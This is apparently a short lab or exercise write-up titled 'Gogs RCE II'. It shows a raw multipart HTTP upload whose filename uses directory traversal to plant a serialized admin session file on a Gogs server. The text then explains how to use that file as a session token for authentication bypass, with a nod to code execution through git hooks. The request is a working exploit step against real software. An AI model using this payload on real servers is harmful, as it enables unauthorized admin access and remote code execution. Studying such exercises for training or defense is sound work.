Gogs RCE II

We can also upload a file like:

Cookie: lang=en-US; i_like_gogs=95fa3f7e7c6bc4f1; ..snip..
Connection: keep-alive

------WebKitFormBoundaryCAhHGeSrB9iHtcBo
Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../../../data/gogs/data/sessions/9/5/95fa3f7e7c6bc4f2"
Content-Type: application/octet-stream

..serialized-string-from-first-exercise..
------WebKitFormBoundaryCAhHGeSrB9iHtcBo--

info

While performing directory traversal, make sure to not replace current session token file with admin user serialized data. We can change a letter at the end and after that use that as session token to perform AUTH BYPASS.

Then we know how to perform RCE from hook. :)